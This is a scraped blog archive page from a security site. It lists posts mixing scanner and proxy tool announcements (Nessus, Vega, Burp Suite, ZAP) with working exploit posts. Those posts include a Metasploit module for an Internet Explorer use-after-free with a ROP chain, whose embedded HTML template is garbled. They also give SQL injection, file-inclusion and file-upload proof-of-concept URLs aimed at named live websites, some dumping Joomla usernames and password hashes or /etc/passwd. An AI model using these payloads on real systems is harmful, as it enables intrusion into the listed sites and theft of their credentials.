Nexus: vulnerabilities

CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

By 0x000216

Read

0 Comments

MS14-012 Internet Explorer TextRange Use-After-Free

By 0x000216

Read

0 Comments

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-012 Internet Explorer TextRange Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
        was most likely introduced back in 2013, therefore only certain builds of MSHTML are
        affected. In our testing with IE9, these vulnerable builds appear to be between
        9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
        (before the patch).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jason Kratzer', # Original discovery
          'sinn3r'         # Port
        ],
      'References'     =>
        [
          [ 'CVE', '2014-0307' ],
          [ 'MSB', 'MS14-012' ]
        ],
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script/i,
          :os_name => OperatingSystems::WINDOWS,
          :ua_name => HttpClients::IE,
          :office  => "2010"
          #:ua_ver  => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
        },
      'Targets'        =>
        [
          [
            'Automatic',
              {
                # mov eax,dword ptr [edx+0C4h]; call eax
                'Pivot' => 0x0c0d1020 # ECX
              }
          ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
        },
      'DefaultOptions'  =>
        {
          'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
          'InitialAutoRunScript' => 'migrate -f'
        },
      'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
      'DefaultTarget'  => 0))
  end
 
  # hxds.dll
  def get_payload
    setup =
    [
      0x51C3B376, # rop nop
      0x51C2046E, # pop edi; ret
      0x51BE4A41, # xchg eax, esp; ret
    ].pack("V*")
 
    # rop nops
    45.times { setup << [0x51C3B376].pack('V*') }
 
    setup << [
      0x51C2046E, # pop edi ; ret
      0x51BD28D4  # mov eax, [ecx], call [eax+8]
    ].pack('V*')
 
    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
 
    Rex::Text.to_unescape(p)
  end
 
  def exploit_html
    template = %Q|DOCTYPE html>
  
    'Cache-Control' content='no-cache'/>
    "X-UA-Compatible" content="IE=edge" >
    
  

'strike();'>

|

return template, binding()

end

def on_request_exploit(cli, request, target_info)

send_exploit_html(cli, exploit_html)

end

source




Read MoreAdd comment




MS14-012 Internet Explorer TextRange Use-After-Free

 
              Reviewed by 0x000216
              on 
              
Monday, March 31, 2014

 
              Rating: 5







        








[Nessus 5.2] Nessus Vulnerability Scanner




By 0x000216
Read
0 Comments



 

New release of the Nessus vulnerability scanner! This is a major  release (moving from 5.0.3 to 5.2.0) and includes several new features  and enhancements, including:
IPv6 is now supported on all platforms (including Windows)
Nessus server support for Windows 8 and Windows 2012
Add attachments within scan result reports  
Mac OS X preference pane 
Digitally-signed Nessus RPM packages for supporting distributions
Smaller memory footprint and reduced disk space usage
Faster, more responsive web interface (uses less bandwidth)
No longer need to visit the Tenable website for an activation code!

Several  key features are described in detail below, including examples of the  new MAC OS X preference pane and the new attachments feature:

 
Add Attachments to Scan Results

Information collected during the scan can now be included in the results as an attachment. The first iteration of attachments will be screenshots, but any attachment type can be included.

Remote Desktop Protocol (RDP)

If Nessus discovers Remote Desktop Protocol on a target, a screenshot is taken. This can reveal information such as the operating system version and the currently-logged-on user.

VNC

If Nessus discovers a target is running VNC without a password to restrict access, a screenshot is included in the results. The above example shows the system using a web browser to visit the www.tenable.com website.

Websites

For Internet-connected web servers, Nessus will take a screenshot of the website as if you visited the website using a web browser. This feature is useful to identify the applications you are testing, including making sure you are testing the correct virtual host.

Mac OS X Preference Pane

The addition of a Nessus server preference pane in OS X allows the user to stop and start the Nessus server process and configure whether or not Nessus is started at boot time.

Getting Nessus 5.2

New users may download and evaluate Nessus free of charge by visiting the Nessus home page. Current customers can download 5.2 from the Tenable Support Portal. Detailed instructions and notes on upgrading are located in the Nessus 5.2 Installation and Configuration Guide.

Nessus ProfessionalFeed and Perimeter Service customers: Please contact Tenable Support (support -at- tenable.com) with any questions regarding the upgrade to Nessus 5.2.0. Users may also visit the Tenable Discussion Portal for more information.

Download Nessus 5.2



Read MoreAdd comment







[Nessus 5.2] Nessus Vulnerability Scanner

 
              Reviewed by 0x000216
              on 
              
Tuesday, April 23, 2013

 
              Rating: 5












        








[Vega v1.0] Web Application Security Scanner




By 0x000216
Read
0 Comments



Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: Javascript.
Vega was developed by Subgraph in Montreal.

Features
Automated Crawler and Vulnerability Scanner
Consistent UI
Website Crawler
Intercepting Proxy
SSL MITM
Content Analysis
Extensibility through a Powerful Javascript Module API
Customizable alerts
Database and Shared Data Model

Some of the features in the 1.0 release include:
Active proxy scanner
Greatly improved detections
Greatly improved support for authenticated scanning
API enhancements
HTTP message viewer enhancements

Modules
Cross Site Scripting (XSS)
SQL Injection
Directory Traversal
URL Injection
Error Detection
File Uploads
Sensitive Data Discovery

Download Vega v1.0 RC84



Read MoreAdd comment







[Vega v1.0] Web Application Security Scanner

 
              Reviewed by 0x000216
              on 
              
Saturday, April 20, 2013

 
              Rating: 5












        








[ExploitSearch.net] Exploit / Vulnerability Search Engine




By 0x000216
Read
0 Comments





Exploitsearch.net, is an attempt at cross  referencing/correlating exploits and vulnerability data from various  sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google  searches, this site actually crawls the source databases/websites and  parses the contained data.  Once the data is collected and parsed, it is  inserted into the www.exploitsearch.net database and becomes available for searching. 


ExploitSearch.net



Read MoreAdd comment







[ExploitSearch.net] Exploit / Vulnerability Search Engine

 
              Reviewed by 0x000216
              on 
              
Sunday, April 14, 2013

 
              Rating: 5












        








phpVMS Virtual Airline Administration <= SQL Injection Vulnerability




By 0x000216
Read
0 Comments



[o] phpVMS Virtual Airline Administration <= SQL Injection Vulnerability

Software : ZAPms
Version   : 2.1.934 & 2.1.935
Vendor   : http://www.phpvms.net
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]


[o] PoC

 http://vupscargo.com/index.php/PopUpNews/popupnewsitem/?itemid=43+union+select+1,version(),database(),4,user()--
http://malaysiava.org/index.php/PopUpNews/popupnewsitem/?itemid=12+union+select+1,version(),database(),4,user()--



Read MoreAdd comment







phpVMS Virtual Airline Administration <= SQL Injection Vulnerability

 
              Reviewed by 0x000216
              on 
              
Sunday, April 14, 2013

 
              Rating: 5












        








ZAPms 1.41 <= SQL Injection Vulnerability




By 0x000216
Read
0 Comments



[o] ZAPms <= SQL Injection Vulnerability

Software : ZAPms
Version   : 1.41
Vendor   : http://www.zapms.de/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/products?pid=[SQLi]


[o] PoC

 http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product



Read MoreAdd comment







ZAPms 1.41 <= SQL Injection Vulnerability

 
              Reviewed by 0x000216
              on 
              
Monday, April 08, 2013

 
              Rating: 5












        








[6Scan] Búsqueda de Vulnerabilidades y Malware en Páginas Webs




By 0x000216
Read
0 Comments




Los servicios que se encargan de buscar vulnerabilidades o malware en las páginas webs.

Una de esas webs que ofrecen ese servicio es 6scan. Esta web posee un servicio gratuíto y otro de pago, que ofrecen distintas alternativas.

Para configurar un escaneo es muy sencillo, solo deberemos de hacer  para empezar poner nuestro correo electrónico y la páginas web que  escanearemos.

Si el servicio de 6scan encuentra una vulnerabilidad o malware  seremos avisados por correo en la versión FREE y por SMS en la versión  PREMIUM.

Se lanza el escaneo a la web en cuestión:

El escano como bien dice, nos avisará en el caso de encontrar una vulnerabilidad.

Podemos añadir mas sitios en el servicio:


Como bien decía dependiendo de si escogemos el servicio gratuito o no, tendremos unas caraterísticas u otras.

Buen servicio que nos ayudará a mitigar en gran medida  vulnerabilidades que puedan salir en una fase de desarrollo mal echa o  incluso también poder mitigar malware que nos salga.

6scan

[Fuente]



Read MoreAdd comment







[6Scan] Búsqueda de Vulnerabilidades y Malware en Páginas Webs

 
              Reviewed by 0x000216
              on 
              
Tuesday, January 22, 2013

 
              Rating: 5












        








Múltiples vulnerabilidades en productos Hitachi




By 0x000216
Read
0 Comments



Hitachi ha publicado varios boletines de seguridad que afectan a diferentes productos, y que pueden permitir a un atacante revelar información sensible y causar denegación de servicio.  Varios fallos son heredados de Apache, integrado en algunos de sus  productos, y los restantes son ataques cross-site scripting.

Los fallos heredados de Apache son y afectan a los siguientes productos:

Denegación de servicio a través de la función 'apr_brigade_split_line' con CVE-2010-1623, que afecta a los productos Cosminexus HTTP Server (v7,v8,v9), Hitachi Web Server (v3,v4).
    
Revelación de información sensible al no restringir la  información de la cabecera HTTP en errores 400 con CVE-2012-0053, que  afecta a los productos Cosminexus HTTP Server (v5,v6,v7,v8,v9), Hitachi  Web Server (v1,v2,v3,v4), Hitachi Web Server - Security Enhancement  (v2).
   
Denegación de servicio a través de la función 'ap_cleanup_scoreboard' con CVE-2012-0031, que afecta a los productos Cosminexus HTTP Server (v7,v8,v9), Hitachi Web Server(v3,v4).

Por otra parte, los productos Groupmax Collaboration  Portal v7, uCosminexus Collaboration Portal v6, Groupmax Collaboration  Web Client - Forum/File Sharing v7, uCosminexus Collaboration Portal -  Forum/File Sharing v6 y Groupmax Collaboration Web Client –  Mail/Schedule v7 son susceptibles a ataques XSS (cross-site scripting).

Más información:

Hitachi (HS12-029):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-029/index.html
Hitachi (HS12-031):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-031/index.html
Hitachi (HS12-032):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-032/index.html
Hitachi (HS12-033):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-033/index.html
Fernando Castillo
fcastillo@hispasec.com
Fuente: http://unaaldia.hispasec.com/



Read MoreAdd comment







Múltiples vulnerabilidades en productos Hitachi

 
              Reviewed by 0x000216
              on 
              
Thursday, December 27, 2012

 
              Rating: 5












        








SmartCMS <= SQL Injection Vuln




By 0x000216
Read
0 Comments




Hei you out there... :)

It's been a long time since my last post..
Well i've been busy with many things and i have a daughter now (6 month). Very beautiful and smart daughter (like her father of course! hahahaha..). We call her "amora". :D


[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Version   : n/a
Vendor   : http://smartcms.nl/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://www.smartcms.nl/cms2/sites/1010/index.php?idx=566+AND+1=2+UNION+ALL+SELECT+database()--
http://www.pokey.nl/cms2/sites/1086/index.php?idx=3397+AND+1=2+UNION+ALL+SELECT+version()--
http://www.devriesenrijke.nl/cms2/sites/1077/index.php?idx=2605+AND+1=2+UNION+ALL+SELECT+user()--




Read MoreAdd comment







SmartCMS <= SQL Injection Vuln

 
              Reviewed by 0x000216
              on 
              
Sunday, November 25, 2012

 
              Rating: 5












        








[ExploitShield Browser Edition] Forget about browser vulnerabilities




By 0x000216
Read
0 Comments



 
ExploitShield Browser Edition protects against all known and unknown  0-day day vulnerability exploits, protecting users where traditional  antivirus and security products fail. It consists of an innovative  patent-pending vulnerability-agnostic application shielding technology  that prevents malicious vulnerability exploits from compromising  computers.
Includes "shields" for all major browsers (IE, Firefox, Chrome, Opera)  and browser all components such as Java, Adobe Reader, Flash, Shockwave.  Blocks all exploit kits such as Blackhole, Sakura, Phoenix, Incognito  without requiring any signature updates.
 
 
No need to train or configure, ExploitShield is 100% install-and-forget  anti-exploit solution. Read more: ExploitShield Browser Edition. The  ZeroVulnerabilityLabs website maintains a realtime list of detected  threats and their VirusTotal results.

Download



Read MoreAdd comment







[ExploitShield Browser Edition] Forget about browser vulnerabilities

 
              Reviewed by 0x000216
              on 
              
Sunday, November 04, 2012

 
              Rating: 5












        








[Burp Suite] Free Edition v1.5




By 0x000216
Read
0 Comments



Burp Suite helps you secure your web applications by finding the  vulnerabilities they contain.  Burp Suite is an integrated platform for  attacking web applications. It contains all of the Burp tools with  numerous interfaces between them designed to facilitate and speed up the  process of attacking an application. All tools share the same robust  framework for handling HTTP requests, persistence, authentication,  upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to  enumerate, analyse, scan, attack and exploit web applications. The  various Burp tools work together effectively to share information and  allow findings identified within one tool to form the basis of an attack  using another.
User Interface:
Burp's UI has been completely overhauled, to improve looks and usability:
Fonts are now available throughout the UI, with corresponding resizing of all UI elements (tables, dialogs, buttons, etc.).
There are configurable hotkeys for all common functions.
Intruder and Repeater now have smart tabs, which you can drag to reorder, and click to create, close or rename.
Tables are natively sortable everywhere, except where the row ordering is part of the options you are configuring.
Text fields now have context-aware auto-complete memory.
Burp now implements sslstrip-style functionality, allowing you to use  non-SSL-capable tools against HTTPS applications, or to perform active  MITM attacks against users who begin browsing using HTTP.
Download Burp Suite Free Edition v1.5



Read MoreAdd comment







[Burp Suite] Free Edition v1.5

 
              Reviewed by 0x000216
              on 
              
Saturday, November 03, 2012

 
              Rating: 5












        








[Scylla] v1 Penetration Testing Tool - Because there's no patch for
human stupidity




By 0x000216
Read
0 Comments




When there's no technical vulnerability to exploit, you should try to  hack what humans left for you, and believe me, this always works.

Scylla provides all the power of what a real audit, intrusion, exclusion  and analysis tool needs, giving the possibility of scanning  misconfiguration bugs dynamically. Scylla aims to be a better tool for  security auditors, extremely fast, designed based on real scenarios,  developed by experienced coders and constructed with actual IT work  methods.
The words “Configuration Tracer” are the best definition for Scylla, a  tool to help on IT audits. Scylla is a tool to audit different online  application protocols and configurations, built over a brute-force core.

This tool acts as a tool for unifying auditing techniques, in other  words, it does what oscanner, winfingerprint, Hydra, DirBuster, and  other tools do, and also what those tools don't do.


Supported Protocols


Terminal (Telnet, SSH, telnets)
FTP (FTPS, FTP, SFTP)
SMB (Also Windows RPC)
LDAP
POP3 (POP3S)
SMTP (SMTPS)
IMAP
MySql
MSSQL
Oracle (Database and TNS Listener)
DB2 (Database and DAS)
HTTP(HTTPS; Basic AUTH Brute Force, Digest AUTH Brute Force, Form Brute Force, Directory and files Brute Force)
DNS (DNS snooping)
Postgres SQL
Basic features:
- User, password list based Brute force
- Multiple hosts support
- Multiple session support
- Nmap integration
- Non-synchronized threads (proof to be a bit faster)
- Ability to restore sessions
- Session auto-saving (based on SQL Server CE)
- Easy to use
- Auto configured options
- Hacker oriented
- Free, and always free
- Database browser (who have hacked a DB and don’t have a DB client to connect to it- And worse if you don’t have internet)
- Open source tool

Download Scylla v1
Screen Shots, lots of screen shots
 
  
  
  
  
              
  
  
  
  
   



Read MoreAdd comment







[Scylla] v1 Penetration Testing Tool - Because there's no patch for
human stupidity

 
              Reviewed by 0x000216
              on 
              
Friday, November 02, 2012

 
              Rating: 5












        








[ZAP] OWASP Zed Attack Proxy Weekly




By 0x000216
Read
0 Comments



The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated  penetration testing tool for finding vulnerabilities in web  applications. It is designed to be used by people with a wide range of  security experience and as such is ideal for developers and functional  testers who are new to penetration testing as well as being a useful  addition to an experienced pen tester's toolbox.
Team is now releasing weekly updates on every Monday. These are not the  full releases , like stable one, but to give more enhancements as soon  as possible, ZAP team decide to release weekly updates also.
The following new features are included in weekly releases:
Completely rewritten 'traditional' Spider (c/o Cosmin Stefan and the GSoC)
New Ajax Spider (using Crawljax, c/o Guifre Ruiz and the GSoC)
Web sockets support (c/o Robert Koch and the GSoC)
Performance improvements (both speed and memory)
Session awareness
Authentication handling
Contexts
Modes (Safe, Protected and Standard)
Online links in menu

Download ZAP week update



Read MoreAdd comment







[ZAP] OWASP Zed Attack Proxy Weekly

 
              Reviewed by 0x000216
              on 
              
Friday, November 02, 2012

 
              Rating: 5












        








Pivotx TimThumb Remote Code Execution Vuln




By 0x000216
Read
0 Comments



[o] PivotX <= Remote Code Execution Vulnerability

Software : PivotX ver 2.2.6
Vendor : http://pivotx.net/
Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]



[o] Vulnerability

pivotx/includes/timthumb.php



[o] Exploit

http://localhost/pivotx/includes/timthumb.php?src=[RCE]



[o] Fix

Upgrade to new version (2.3.0)




Read MoreAdd comment







Pivotx TimThumb Remote Code Execution Vuln

 
              Reviewed by 0x000216
              on 
              
Saturday, October 15, 2011

 
              Rating: 5












        








PlaySMS Remote File Inclusion Vulnerability




By 0x000216
Read
0 Comments



[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe


[o] Vulnerability

affected all this files

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php


[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?





Read MoreAdd comment







PlaySMS Remote File Inclusion Vulnerability

 
              Reviewed by 0x000216
              on 
              
Tuesday, September 06, 2011

 
              Rating: 5












        








JoomTouch Joomla Component <= LFI Vuln




By 0x000216
Read
0 Comments



[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability



Software : com_joomtouch ver 1.0.2

Vendor : http://www.joomtouch.com/

Dork : "com_joomtouch"

Author : NoGe





[o] Exploit



http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]





[o] PoC



http://torah5.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00







DIRGAHAYU INDONESIAKU... MERDEKA!!!





Read MoreAdd comment







JoomTouch Joomla Component <= LFI Vuln

 
              Reviewed by 0x000216
              on 
              
Wednesday, August 17, 2011

 
              Rating: 5












        








TNR Enhanced Joomla Search SQL Injection Vulnerability




By 0x000216
Read
0 Comments



[o] TNR Enhanced Joomla Search SQL Injection Vulnerability



Software : com_esearch ver 3.0.0

Vendor : http://www.tnrjoomla.com/

Dork : "com_esearch"

Author : NoGe





[o] Exploit



http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]





[o] PoC



http://www.visitdetroit.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--

http://www.tnrjoomla.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--





Read MoreAdd comment







TNR Enhanced Joomla Search SQL Injection Vulnerability

 
              Reviewed by 0x000216
              on 
              
Tuesday, August 09, 2011

 
              Rating: 5












        








Blue Utopia CMS SQLi Vulnerability




By 0x000216
Read
0 Comments



[o] Blue Utopia CMS SQL Injection Vulnerability

Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?page=news&full=[SQLi}


[o] PoC

http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--


[o] Note

this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))




Read MoreAdd comment







Blue Utopia CMS SQLi Vulnerability

 
              Reviewed by 0x000216
              on 
              
Saturday, July 16, 2011

 
              Rating: 5












        








MyNews Arbitrary File Upload Vuln




By 0x000216
Read
0 Comments



[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe


[o] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader". 

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"

http://localhost/[path]/files/your_file.txt


[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html




Read MoreAdd comment







MyNews Arbitrary File Upload Vuln

 
              Reviewed by 0x000216
              on 
              
Saturday, July 16, 2011

 
              Rating: 5